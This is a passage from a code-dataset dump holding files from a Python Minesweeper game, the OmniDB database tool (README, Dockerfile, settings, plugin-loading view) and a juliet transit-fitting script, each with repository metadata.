if self.board[y-1][x].getBomb():\n if y-1<0:\n raise IndexError\n bombNum=bombNum+1\n except IndexError:\n pass\n try:\n if self.board[y-1][x+1].getBomb():\n if y-1<0:\n raise IndexError\n bombNum=bombNum+1\n except IndexError:\n pass\n try:\n if self.board[y-1][x-1].getBomb():\n if y-1<0 or x-1<0:\n raise IndexError\n bombNum=bombNum+1\n except IndexError:\n pass\n return str(bombNum)\n \n def selectFirst(self,y,x):\n if self.board[y-1][x-1].getBomb():\n newSquare=choice(choice(self.board))\n while newSquare.getBomb():\n newSquare=choice(choice(self.board))\n self.board[y-1][x-1].setBomb(False)\n newSquare.setBomb(True)\n self.select(y,x)\n \n def autoSelect(self,y,x):\n b=y-1\n a=x\n if self.checkValid(b,a) and not(self.board[b-1][a-1].getBomb()):\n self.select(b,a)\n b=y-1\n a=x-1\n if self.checkValid(b,a) and not(self.board[b-1][a-1].getBomb()):\n self.select(b,a)\n b=y-1\n a=x+1\n if self.checkValid(b,a) and not(self.board[b-1][a-1].getBomb()):\n self.select(b,a)\n b=y\n a=x-1\n if self.checkValid(b,a) and not(self.board[b-1][a-1].getBomb()):\n self.select(b,a)\n b=y\n a=x+1\n if self.checkValid(b,a) and not(self.board[b-1][a-1].getBomb()):\n self.select(b,a)\n b=y+1\n a=x-1\n if self.checkValid(b,a) and not(self.board[b-1][a-1].getBomb()):\n self.select(b,a)\n b=y+1\n a=x\n if self.checkValid(b,a) and not(self.board[b-1][a-1].getBomb()):\n self.select(b,a)\n b=y+1\n a=x+1\n if self.checkValid(b,a) and not(self.board[b-1][a-1].getBomb()):\n self.select(b,a)\n \n def isWin(self):\n nonBomb=self.height*self.length-self.bombNum\n select=0\n for line in self.board:\n for square in line:\n if square.getText() in ['0','1','2','3','4','5','6','7','8']:\n select=select+1\n if select==nonBomb:\n return True\n else:\n return False\n \n def showAllBombs(self):\n for line in self.board:\n for square in line:\n if square.getBomb():\n square.changeText('B')\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n "
},
{
"alpha_fraction": 0.8148148059844971,
"alphanum_fraction": 0.8148148059844971,
"avg_line_length": 27,
"blob_id": "9aa0d128de01d21cc762ded48677a25929b93097",
"content_id": "9aaa87ca8b0086b11717e7a4216fce9913dade51",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 27,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 1,
"path": "/readme.txt",
"repo_name": "haotiaz/Minesweeper",
"src_encoding": "UTF-8",
"text": "This is a minesweeper game."
},
{
"alpha_fraction": 0.5247336626052856,
"alphanum_fraction": 0.5327244997024536,
"avg_line_length": 33.24324417114258,
"blob_id": "e8d015b62ca2d08a0ce8d289571410e95067c02b",
"content_id": "70a2c6912efba502e8d439f7fab9a42486429cfd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2640,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 74,
"path": "/Driver.py",
"repo_name": "haotiaz/Minesweeper",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 26 11:46:49 2018\n\n@author: apple\n\"\"\"\nfrom Minesweeper import Minesweeper\n\nwin=0\nlose=0\nwhile True:\n height=int(input('Enter a height: '))\n length=int(input('Enter a length: '))\n bomb=int(input('Enter the number of bombs: '))\n while bomb>height*length:\n print('Invalid Input')\n height=int(input('Enter a height: '))\n length=int(input('Enter a length: '))\n bomb=int(input('Enter the number of bombs: '))\n minesweeper=Minesweeper(height,length,bomb)\n #minesweeper._getSolution()\n minesweeper.printBoard()\n x=int(input('Select an x coordinate: '))\n y=int(input('Select an y coordinate: '))\n while not minesweeper.checkValid(y,x):\n print('Invalid Input')\n x=int(input('Select an x coordinate: '))\n y=int(input('Select an y coordinate: '))\n minesweeper.selectFirst(y,x)\n minesweeper.printBoard()\n if minesweeper.isWin():\n win=win+1\n print('You win')\n again=input('Do you want to play again (\"yes\" or \"no\")? ')\n if again=='yes':\n continue\n elif again=='no':\n print('Win:'+str(win)+' Lose:'+str(lose))\n break\n while True:\n choice=input('“select” or “flag” or “unflag”? ')\n if choice=='select':\n x=int(input('Select an x coordinate: '))\n y=int(input('Select an y coordinate: '))\n if minesweeper.checkValid(y,x) and minesweeper.board[y-1][x-1].getBomb():\n minesweeper.showAllBombs()\n minesweeper.printBoard()\n minesweeper.setStatus('lose')\n print('Bomb! You lose')\n lose=lose+1\n break\n minesweeper.select(y,x)\n minesweeper.printBoard()\n if minesweeper.isWin():\n win=win+1\n print('You win')\n break\n elif choice=='flag':\n x=int(input('Select an x coordinate: '))\n y=int(input('Select an y coordinate: '))\n minesweeper.flag(y,x)\n minesweeper.printBoard()\n elif choice=='unflag':\n x=int(input('Select an x coordinate: '))\n y=int(input('Select an y coordinate: '))\n minesweeper.unflag(y,x)\n minesweeper.printBoard()\n again=input('Do you want to play again (\"yes\" or \"no\")? ')\n if again=='yes':\n continue\n elif again=='no':\n print('Win:'+str(win)+' Lose:'+str(lose))\n break\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n "
},
{
"alpha_fraction": 0.5228365659713745,
"alphanum_fraction": 0.5396634340286255,
"avg_line_length": 17.93181800842285,
"blob_id": "390a0fd6982006ff83802d33301e344a08b58cd3",
"content_id": "9e2136340dcd10aa92f9d1a9ad35248fd2cb70dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 832,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 44,
"path": "/Square.py",
"repo_name": "haotiaz/Minesweeper",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 29 20:05:43 2018\n\n@author: apple\n\"\"\"\n\nclass Square:\n def __init__(self):\n self.text='-'\n self.selected=False\n self.flagged=False\n self.isBomb=False\n \n def beSelected(self):\n self.selected=True\n \n def isSelected(self):\n return self.selected\n \n def beFlagged(self):\n self.flagged=True\n \n def beUnflagged(self):\n self.flagged=False\n \n def setText(self,t):\n self.text=t\n \n def getText(self):\n return self.text\n \n def getBomb(self):\n return self.isBomb\n \n def setBomb(self,b):\n self.isBomb=b\n \n def isFlagged(self):\n return self.flagged\n \n def changeText(self,text):\n self.text=text"
}
] | 4 |
SebastianPopescu/Bayesian_Neural_Network
|
https://github.com/SebastianPopescu/Bayesian_Neural_Network
|
b2dd68630b0fdde9e2b8ac38ac5be7ec23663d0d
|
b6642c7b637f562af37735069d7f0e197d02d09e
|
a1481033a28cd08e78e6670cb4ae150596d74ce1
|
refs/heads/master
| 2020-02-29T02:26:59.827361 | 2017-04-14T20:41:10 | 2017-04-14T20:41:10 | 88,281,386 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6499068737030029,
"alphanum_fraction": 0.6741154789924622,
"avg_line_length": 35.03960418701172,
"blob_id": "78d1d7ec6e1eda1de7caee8f458a7be7354454b4",
"content_id": "017150f8b86dcc451c8b39d4544c0cf7f29c4ad7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3759,
"license_type": "no_license",
"max_line_length": 211,
"num_lines": 101,
"path": "/Bayesian_Neural_Network.py",
"repo_name": "SebastianPopescu/Bayesian_Neural_Network",
"src_encoding": "UTF-8",
"text": "import numpy as np\r\nimport tensorflow as tf\r\nfrom collections import defaultdict\r\n\r\n\r\n\r\nclass Bayesian_Neural_Network(object):\r\n\r\n\tdef __init__(self,num_data,num_test,num_minibatch,dim_layers,dim_input,dim_output,num_hidden_layers):\r\n\r\n\t\tself.sess = tf.Session()\r\n\t\tself.num_data = num_data\r\n\t\tself.num_test = num_test\r\n\t\tself.num_minibatch = num_minibatch\r\n\t\tself.dim_layers = dim_layers\r\n\t\tself.dim_input = dim_input\r\n\t\tself.dim_output =dim_output\r\n\t\tself.num_hidden_layers = num_hidden_layers\r\n\t\tself.X_train = tf.placeholder(shape=(self.num_data,self.dim_input),dtype=tf.float32)\r\n\t\tself.Y_train = tf.placeholder(shape=(self.num_data,self.dim_output),dtype=tf.float32)\r\n\r\n\t\tself.X_test = tf.placeholder(shape=(self.num_test,self.dim_input),dtype=tf.float32)\r\n\t\tself.Y_test = tf.placeholder(shape=(self.num_test,self.dim_output),dtype=tf.float32)\r\n\r\n\t\tself.W_mean = defaultdict()\r\n\t\tself.W_var =defaultdict()\r\n\t\tself.W_var_chol = defaultdict()\r\n\t\tself.W_var_chol_plm = defaultdict()\r\n\t\tself.b = defaultdict()\r\n\t\t\r\n\r\n\t\tfor l in range(1,self.num_hidden_layers+2):\r\n\r\n\t\t\tself.W_mean[l] = []\r\n\t\t\tself.W_var_chol[l] = []\r\n\t\t\tself.W_var_chol_plm[l] =[]\r\n\t\t\tself.b[l] = tf.Variable(tf.ones(shape=(self.dim_layers[l],)))\r\n\t\t\tfor j in range(self.dim_layers[l]):\r\n\t\t\t\t\r\n\t\t\t\tself.W_mean[l].append(tf.Variable(tf.random_normal(shape=(self.dim_layers[l-1],1)),dtype=tf.float32))\r\n\t\t\t\tself.W_var_chol_plm[l].append(tf.Variable(tf.random_normal(shape=(self.dim_layers[l-1],self.dim_layers[l-1])),dtype=tf.float32))\r\n\t\t\t\tself.W_var_chol[l].append(tf.matrix_band_part(self.W_var_chol_plm[l][j],-1,0))\r\n\r\n\r\n\tdef hidden_layer(self,forward_layer_number,input):\r\n\r\n\t\tw_values_list_overall = []\r\n\t\tfor j in range(self.dim_layers[forward_layer_number]):\r\n\t\t\tw_values_list = []\r\n\t\t\tfor i in range(500):\r\n\r\n\t\t\t\tnormal_distribution_sampled = tf.random_normal(shape=(self.dim_layers[forward_layer_number-1],1))\r\n\t\t\t\tw_values_list.append(tf.reshape(tf.add(tf.matmul(self.W_var_chol[forward_layer_number][j],normal_distribution_sampled),self.W_mean[forward_layer_number][j]),shape=(self.dim_layers[forward_layer_number-1],)))\r\n\t\t\t\r\n\t\t\tw_values_list_overall.append(w_values_list)\r\n\t\t\r\n\t\tw_values_list_overall = tf.div(tf.add_n(w_values_list_overall),500.0) \t\t\r\n\t\tcurrent_w_transposed = tf.stack(w_values_list_overall)\r\n\r\n\t\toutput_temp = tf.add(tf.matmul(input,tf.transpose(current_w_transposed)),self.b[forward_layer_number])\r\n\r\n\t\toutput = tf.nn.relu(output_temp)\r\n\r\n\t\treturn output\r\n\r\n\tdef predict(self,X):\r\n\r\n\t\tinput = self.hidden_layer(1,X)\r\n\r\n\t\tfor l in range(2,self.num_hidden_layers+2):\r\n\t\t\tinput = self.hidden_layer(l,input)\r\n\r\n\t\treturn input\r\n\r\n\tdef session_TF(self,X_train,Y_train):\r\n\r\n\t\tpredictions_training = self.predict(X= self.X_train)\r\n\t\tcost = tf.sqrt(tf.reduce_mean(tf.square(tf.subtract(self.Y_train, predictions_training))))\r\n\t\ttrain_op = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)\r\n\t\tself.sess.run(tf.initialize_all_variables())\r\n\r\n\t\tfor i in range(10000):\r\n\r\n\t\t\tself.sess.run(train_op,feed_dict={self.X_train:X_train,self.Y_train:Y_train})\r\n\t\t\t\r\n\t\t\tprint self.sess.run(tf.reduce_mean(tf.square(tf.subtract(self.Y_train, predictions_training))),feed_dict={self.Y_train:Y_train,self.X_train:X_train} )\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n\r\n\tx_train = np.linspace(0.0,1.0,500)\r\n\tx_train = np.reshape(x_train,(500,1))\r\n\ty_train = x_train + 0.3 * np.sin(2.0 * np.pi * (x_train + np.random.normal(size=(500,1)))) + 0.3 * np.sin( 4.0 * np.pi * (x_train + np.random.normal(size=(500,1))))\r\n\r\n\t\r\n\ty_train = np.reshape(y_train,(500,1))\r\n\r\n\tBNN = Bayesian_Neural_Network(num_data=500,num_test=1000,num_minibatch=10,dim_layers=[1,10,10,1],dim_input=1,dim_output=1,num_hidden_layers=2)\r\n\tBNN.session_TF(X_train = x_train,Y_train = y_train)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
}
] | 1 |
zsozsoGit/OmniDB_
|
https://github.com/zsozsoGit/OmniDB_
|
090bc2613fccc7504ff3749eddb5e4f8982c6c14
|
566e3ea38ea80cf2554442e098b438aab47b59e3
|
06a54d785b1eff1193d1eea36f235022266d4fac
|
refs/heads/master
| 2020-04-19T17:17:26.354898 | 2019-01-30T16:15:23 | 2019-01-30T16:15:23 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7343694567680359,
"alphanum_fraction": 0.7467325925827026,
"avg_line_length": 32.11111068725586,
"blob_id": "da22bd9519ca1fe241fd5b40d88183bb81b254a0",
"content_id": "c5e91ef043005bee00c755ca04a999b0cf00d694",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5662,
"license_type": "permissive",
"max_line_length": 162,
"num_lines": 171,
"path": "/README.md",
"repo_name": "zsozsoGit/OmniDB_",
"src_encoding": "UTF-8",
"text": "## Next Release: *2.14.0 - February 14, 2019*\n\n# OmniDB 2.13.0\n\n## Release Date: *December 20, 2018*\n\n## Release Notes\n\n- New features:\n - Connection Groups: allow users to, for example, easily distinct Production and Test database servers\n - User and connection management via omnidb-config CLI utility, which helps with automated deploying\n- Improvements:\n - Advanced Object Search now considers view and materialized view definition\n - Show trigger function when expanding the trigger node in the tree view\n - PostgreSQL: Improved \\h command, which provides syntax help on SQL commands\n - Linux: OmniDB systemd service now uses configuration file in /etc/omnidb.conf\n - Converted all OmniDB users passwords into hashes in the OmniDB user database, improving security\n - OmniDB upgrade procedure now takes a backup of the user database (file omnidb.db)\n - Autocommit is now always enabled on Oracle/MySQL/MariaDB\n - User won't need to execute query again after password expiration / re-validation\n - OmniDB debugger plugin for PostgreSQL 11 for FreeBSD\n- Bug fixes:\n - Fixed: Click index with WHERE clause: \"Can only transpose a table with a single row\"\n - Fixed: Export to XLSX/CSV does not consider all rows\n - Fixed: Error closing error window\n - Fixed: Monitoring Dashboard: Column widths are not adjusted when the monitoring tab doesn't have focus\n - Fixed: User Mapping is not being shown in the tree if there are no options\n - Fixed: Foreign Table DDL not being shown correctly if there are no options\n - Fixed: DDL for functions and procedures do not show a necessary comma after function body\n\n\n# 1- Installation\n\n## 1.1- Installation packages\n\nJust go to [omnidb.org](https://omnidb.org), download the appropriate file for your\noperating system and architecture and install it.\n\n## 1.2- From source\n\n### 1.2.1- On Debian >= 9 with `pip`\n\n```\nsudo apt install python3-pip\npip3 install pip --upgrade\npip3 install -r requirements.txt\n```\n\n### 1.2.2- On Debian/Ubuntu using `PyEnv`\n\n```\nsudo apt install git make build-essential libssl-dev zlib1g-dev libbz2-dev libreadline-dev libsqlite3-dev wget curl llvm libncurses5-dev libncursesw5-dev xz-utils\n\ngit clone https://github.com/pyenv/pyenv.git ~/.pyenv\necho 'export PYENV_ROOT=\"$HOME/.pyenv\"' >> ~/.bashrc\necho 'export PATH=\"$PYENV_ROOT/bin:$PATH\"' >> ~/.bashrc\necho 'eval \"$(pyenv init -)\"' >> ~/.bashrc\nsource ~/.bashrc\n\npyenv install 3.5.2\ncd OMNIDB_FOLDER\npyenv local 3.5.2\n\npip install pip --upgrade\npip install -r requirements.txt\n```\n\n## 1.3- Running OmniDB\n\nDownload or clone OmniDB repo and extract it somewhere. To start Django server, enter into `OmniDB/OmniDB` folder and type:\n\n```\npython omnidb-server.py\n```\n\n# 2- Introduction\n\n**OmniDB** is a web tool that simplifies database management focusing on interactivity, designed to be powerful and lightweight. Check-out some characteristics:\n\n- **Web Tool**: Accessible from any platform, using a browser as a medium\n- **Responsive Interface**: All available functions in a single page\n- **Unified Workspace**: Different technologies managed in a single workspace\n- **Simplified Editing**: Easy to add and remove connections\n- **Safety**: Multi-user support with encrypted personal information\n- **Interactive Tables**: All functionalities use interactive tables, allowing copying and pasting in blocks\n- **Smart SQL Editor**: Contextual SQL code completion\n- **Beautiful SQL Editor**: You can choose between many available color themes\n- **Tabbed SQL Editor**: Easily add, rename or delete editor tabs\n\n\n\nTechnologies:\n\n- Python (3.5+)\n- Django\n\nSupported Platforms:\n\n- Linux\n- Windows\n- OS X\n\nSupported DBMS:\n\n- [X] PostgreSQL\n- [X] Oracle\n- [X] MySQL / MariaDB\n- [ ] Firebird\n- [ ] SQLite\n- [ ] Microsoft SQL Server\n- [ ] IBM DB2\n\n# 3- Database Schema Management\n\nOmniDB is designed for easy database management. Here are some features:\n\n- Tree view showing database structure\n\n\n\n- Powerful table creation\n - Editing capabilities:\n - Tables' names\n - Columns: name, type and nullable\n - Primary keys and respective columns\n - Foreign keys with either table and reference columns, including updating rules and removal as well\n - Indexes\n\n\n\n- Table editing: Edit table structure according to DBMS limitations\n- Data management: Add, edit and remove records\n\n\n\n- SQL Editing\n - Syntax highlighting for SQL\n - SQL code completion for table columns and subquery\n - Multiple themes to be selected\n\n\n\n- Support for external tools:\n - [pglogical](https://www.2ndquadrant.com/en/resources/pglogical/)\n - [Postgres-BDR](https://www.2ndquadrant.com/en/resources/bdr/)\n - [Postgres-XL](https://www.2ndquadrant.com/en/resources/postgres-xl/)\n\n\n- Other features:\n - Querying organized in tables\n - DDL commands execution\n - SQL history\n - Graphs displaying tables and their relations\n\n\n\n - Graphs displaying complete ER diagram\n\n\n\n - Visualization of explain plan\n\n\n\n - PL/pgSQL function debugger (requires a plugin, please see [here](https://github.com/OmniDB/OmniDB/blob/master/omnidb_plugin/README.md))\n\n\n\n - Monitoring dashboard\n\n\n"
},
{
"alpha_fraction": 0.6068965792655945,
"alphanum_fraction": 0.6689655184745789,
"avg_line_length": 21.894737243652344,
"blob_id": "15fbafb63e6b6ed026e542db5a4c44d7cc29053e",
"content_id": "a1aeb90c8eb6ae25dec9eaf3a0934063e994ac4e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 435,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 19,
"path": "/Dockerfile",
"repo_name": "zsozsoGit/OmniDB_",
"src_encoding": "UTF-8",
"text": "FROM debian:stable-slim\n\nRUN apt-get update \\\n && apt-get -y upgrade \\\n && apt-get install -y systemd \\\n && apt-get install -y wget \\\n && rm -rf /var/lib/apt/lists/*\n\nRUN mkdir /app\nWORKDIR /app\n\nRUN wget -q https://omnidb.org/dist/2.5.0/omnidb-server_2.5.0-debian-amd64.deb \\\n && dpkg -i /app/omnidb-server_2.5.0-debian-amd64.deb \\\n && rm -rf omnidb-server_2.5.0-debian-amd64.deb\n\nEXPOSE 8000\nEXPOSE 25482\n\nCMD [\"omnidb-server\"]\n"
},
{
"alpha_fraction": 0.5676797032356262,
"alphanum_fraction": 0.5698104500770569,
"avg_line_length": 36.46638488769531,
"blob_id": "33e24c62ae3de8baa2a7f8ae637f24b8694abcb1",
"content_id": "60373fa4091d77e83f9600233bab90de7964c2d4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8917,
"license_type": "permissive",
"max_line_length": 158,
"num_lines": 238,
"path": "/OmniDB/OmniDB_app/views/plugins.py",
"repo_name": "zsozsoGit/OmniDB_",
"src_encoding": "UTF-8",
"text": "from django.http import HttpResponse\nfrom django.template import loader\nfrom django.http import JsonResponse\nfrom django.core import serializers\nfrom django.shortcuts import redirect\nfrom datetime import datetime\nfrom math import ceil\nimport json\nfrom os import listdir\nfrom os.path import isfile, join, isdir\nfrom OmniDB import settings\nimport importlib\nfrom configparser import ConfigParser\nfrom itertools import chain\n\nimport OmniDB_app.include.OmniDatabase as OmniDatabase\n\n#loading python plugins\nplugins = {}\nplugins_folders = listdir(settings.PLUGINS_DIR)\n\ndef load_plugins():\n for plugin_folder in plugins_folders:\n plugin_name = ''\n plugin_version = ''\n enabled = True\n if isfile(join(settings.PLUGINS_DIR,plugin_folder,'plugin.conf')):\n conf_exists = True\n else:\n conf_exists = False\n enabled = False\n if isfile(join(settings.PLUGINS_STATIC_DIR,plugin_folder,'plugin.js')):\n js_exists = True\n else:\n js_exists = False\n enabled = False\n if isfile(join(settings.PLUGINS_DIR,plugin_folder,'plugin.py')):\n py_exists = True\n else:\n py_exists = False\n enabled = False\n if isfile(join(settings.PLUGINS_STATIC_DIR,plugin_folder,'plugin.css')):\n css_exists = True\n else:\n css_exists = False\n #if is directory, try to import plugin.py inside it\n if isdir(join(settings.PLUGINS_DIR,plugin_folder)):\n try:\n parser = ConfigParser()\n with open(join(settings.PLUGINS_DIR,plugin_folder,'plugin.conf')) as lines:\n lines = chain((\"[top]\",), lines)\n parser.read_file(lines)\n plugin_name = parser.get('top', 'name')\n plugin_version = parser.get('top', 'version')\n\n plugins[plugin_name] = {\n 'module' : importlib.import_module('OmniDB_app.plugins.{0}.plugin'.format(plugin_folder)),\n 'folder' : plugin_folder,\n 'name' : plugin_name,\n 'version' : plugin_version,\n 'conf_exists' : conf_exists,\n 'js_exists' : js_exists,\n 'py_exists' : py_exists,\n 'css_exists' : css_exists,\n 'enabled' : enabled,\n 'javascript_file': '/static/plugins/{0}/plugin.js'.format(plugin_folder),\n 'css_file' : '/static/plugins/{0}/plugin.css'.format(plugin_folder) if css_exists else '',\n 'plugin_folder' : '/static/plugins/{0}/'.format(plugin_folder)\n }\n print('Loaded plugin {0}.'.format(plugin_name),flush=True)\n except Exception as exc:\n print('Failed to load plugin {0}: {1}.'.format(plugin_name, str(exc)),flush=True)\n plugins[plugin_name] = {\n 'module' : None,\n 'folder' : plugin_folder,\n 'name' : plugin_name,\n 'version' : plugin_version,\n 'conf_exists' : conf_exists,\n 'js_exists' : js_exists,\n 'py_exists' : py_exists,\n 'css_exists' : css_exists,\n 'enabled' : enabled,\n 'javascript_file': '/static/plugins/{0}/plugin.js'.format(plugin_folder),\n 'css_file' : '/static/plugins/{0}/plugin.css'.format(plugin_folder) if css_exists else '',\n 'plugin_folder' : '/static/plugins/{0}/'.format(plugin_folder)\n }\n\nload_plugins()\n\n#reloading plugins\ndef reload_plugins(request):\n\n v_return = {}\n v_return['v_data'] = ''\n v_return['v_error'] = False\n v_return['v_error_id'] = -1\n\n #Invalid session\n if not request.session.get('omnidb_session'):\n v_return['v_error'] = True\n v_return['v_error_id'] = 1\n return JsonResponse(v_return)\n\n v_session = request.session.get('omnidb_session')\n\n load_plugins()\n\n v_return['v_data'] = True\n\n return JsonResponse(v_return)\n\n#loading javascript plugins\ndef get_plugins(request):\n\n v_return = {}\n v_return['v_data'] = ''\n v_return['v_error'] = False\n v_return['v_error_id'] = -1\n\n #Invalid session\n if not request.session.get('omnidb_session'):\n v_return['v_error'] = True\n v_return['v_error_id'] = 1\n return JsonResponse(v_return)\n\n v_session = request.session.get('omnidb_session')\n\n json_object = json.loads(request.POST.get('data', None))\n plugin_list = []\n for key, plugin in plugins.items():\n if plugin['enabled']:\n plugin_list.append({ 'name': plugin['name'], 'file': plugin['javascript_file'], 'cssfile': plugin['css_file'], 'folder': plugin['plugin_folder']})\n\n v_return['v_data'] = plugin_list\n\n return JsonResponse(v_return)\n\n#loading javascript plugins\ndef list_plugins(request):\n\n v_return = {}\n v_return['v_data'] = ''\n v_return['v_error'] = False\n v_return['v_error_id'] = -1\n\n #Invalid session\n if not request.session.get('omnidb_session'):\n v_return['v_error'] = True\n v_return['v_error_id'] = 1\n return JsonResponse(v_return)\n\n v_session = request.session.get('omnidb_session')\n\n json_object = json.loads(request.POST.get('data', None))\n plugin_list = []\n for key, plugin in plugins.items():\n if plugin['conf_exists']:\n conf_html = '<i class=\"fas fa-check-circle action-grid action-check\"></i>'\n else:\n conf_html = '<i class=\"fas fa-times action-grid action-close\"></i>'\n if plugin['js_exists']:\n js_html = '<i class=\"fas fa-check-circle action-grid action-check\"></i>'\n else:\n js_html = '<i class=\"fas fa-times action-grid action-close\"></i>'\n if plugin['py_exists']:\n py_html = '<i class=\"fas fa-check-circle action-grid action-check\"></i>'\n else:\n py_html = '<i class=\"fas fa-times action-grid action-close\"></i>'\n if plugin['css_exists']:\n css_html = '<i class=\"fas fa-check-circle action-grid action-check\"></i>'\n else:\n css_html = '<i class=\"fas fa-times action-grid action-close\"></i>'\n if plugin['enabled']:\n plugin_enabled = '<i class=\"fas fa-check-circle action-grid action-check\"></i>'\n else:\n plugin_enabled = '<i class=\"fas fa-times action-grid action-close\"></i>'\n\n plugin_list.append([plugin['folder'],plugin['name'],plugin['version'],conf_html,js_html,py_html,css_html,plugin_enabled])\n\n v_return['v_data'] = plugin_list\n\n return JsonResponse(v_return)\n\ndef exec_plugin_function(request):\n\n v_return = {}\n v_return['v_data'] = ''\n v_return['v_error'] = False\n v_return['v_error_id'] = -1\n\n #Invalid session\n if not request.session.get('omnidb_session'):\n v_return['v_error'] = True\n v_return['v_error_id'] = 1\n return JsonResponse(v_return)\n\n v_session = request.session.get('omnidb_session')\n\n json_object = json.loads(request.POST.get('data', None))\n p_plugin_name = json_object['p_plugin_name']\n p_function_name = json_object['p_function_name']\n p_data = json_object['p_data']\n p_check_database_connection = json_object['p_check_database_connection']\n p_database_index = json_object['p_database_index']\n p_tab_id = json_object['p_tab_id']\n\n try:\n v_database_orig = v_session.v_tab_connections[p_tab_id]\n v_database = OmniDatabase.Generic.InstantiateDatabase(\n v_database_orig.v_db_type,\n v_database_orig.v_connection.v_host,\n str(v_database_orig.v_connection.v_port),\n v_database_orig.v_service,\n v_database_orig.v_user,\n v_database_orig.v_connection.v_password,\n v_database_orig.v_conn_id,\n v_database_orig.v_alias,\n 'OmniDB / {0}'.format(p_plugin_name)\n )\n except:\n v_database = None\n\n #Check database prompt timeout\n if p_check_database_connection and p_database_index:\n v_timeout = v_session.DatabaseReachPasswordTimeout(int(p_database_index))\n if v_timeout['timeout']:\n v_return['v_data'] = {'password_timeout': True, 'message': v_timeout['message'] }\n v_return['v_error'] = True\n return JsonResponse(v_return)\n\n try:\n v_return['v_data'] = getattr(plugins[p_plugin_name]['module'], p_function_name)(v_database,p_data)\n except Exception as exc:\n v_return['v_data'] = {'password_timeout': True, 'message': str(exc) }\n v_return['v_error'] = True\n return JsonResponse(v_return)\n\n return JsonResponse(v_return)\n"
},
{
"alpha_fraction": 0.6532663106918335,
"alphanum_fraction": 0.7185929417610168,
"avg_line_length": 18.899999618530273,
"blob_id": "dbbb4bcda3eabfb5bddb029ffc9e2ffe85568fd4",
"content_id": "b51a909f1dfae27f1b12c4c9c0252199f4576cae",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 199,
"license_type": "permissive",
"max_line_length": 32,
"num_lines": 10,
"path": "/OmniDB/OmniDB/custom_settings.py",
"repo_name": "zsozsoGit/OmniDB_",
"src_encoding": "UTF-8",
"text": "import os\n\nOMNIDB_VERSION = 'OmniDB 2.13.0'\nOMNIDB_SHORT_VERSION = '2.13.0'\nDEV_MODE = True\nDESKTOP_MODE = False\nHOME_DIR = None\nAPP_TOKEN = None\nPWD_TIMEOUT_TOTAL = 1800\nTHREAD_POOL_MAX_WORKERS = 2\n"
}
] | 4 |
nespinoza/BayesianDetectionST
|
https://github.com/nespinoza/BayesianDetectionST
|
539f7ae94b91e7ecba68380df9b91952b2e99f7e
|
272f266cc9925b1082b5ff4dffff68eac3278004
|
0964287f5e8d4cdc45137b5319fc0eeec2f363f4
|
refs/heads/master
| 2022-12-26T16:38:26.722960 | 2020-10-11T22:36:51 | 2020-10-11T22:36:51 | 303,217,942 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6391128897666931,
"alphanum_fraction": 0.6532257795333862,
"avg_line_length": 40.33333206176758,
"blob_id": "2c685d89605e9ff84ad7e3e9a41b76bdbb7a7d33",
"content_id": "39786bf88d2f76a33c18029894aebea0464f65a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 496,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 12,
"path": "/run_no_transit.py",
"repo_name": "nespinoza/BayesianDetectionST",
"src_encoding": "UTF-8",
"text": "import juliet\nimport numpy as np\nimport glob\n\nfolders = glob.glob('sim_*')\nfor folder in folders:\n files = glob.glob(folder+'/noisy_model*')\n for lcfile in files:\n print(lcfile)\n f = lcfile.split('/')[-1].split('.dat')[0]\n dataset = juliet.load(priors='priors_no_transit.dat', lcfilename=lcfile, out_folder = folder+'/'+f+'_results-no-transit', verbose = True)\n results = dataset.fit(use_dynesty=True, dynamic = True, dynesty_nthreads = 6, n_live_points = 1000)\n"
},
{
"alpha_fraction": 0.5477213859558105,
"alphanum_fraction": 0.6040412783622742,
"avg_line_length": 40.53571319580078,
"blob_id": "ac2430ba7c6c57fc6acd3f8fc9b0a646ecf0bba6",
"content_id": "8842fa5004a3750a09325f08c852cd5841aedbbe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2326,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 56,
"path": "/generate_lcs.py",
"repo_name": "nespinoza/BayesianDetectionST",
"src_encoding": "UTF-8",
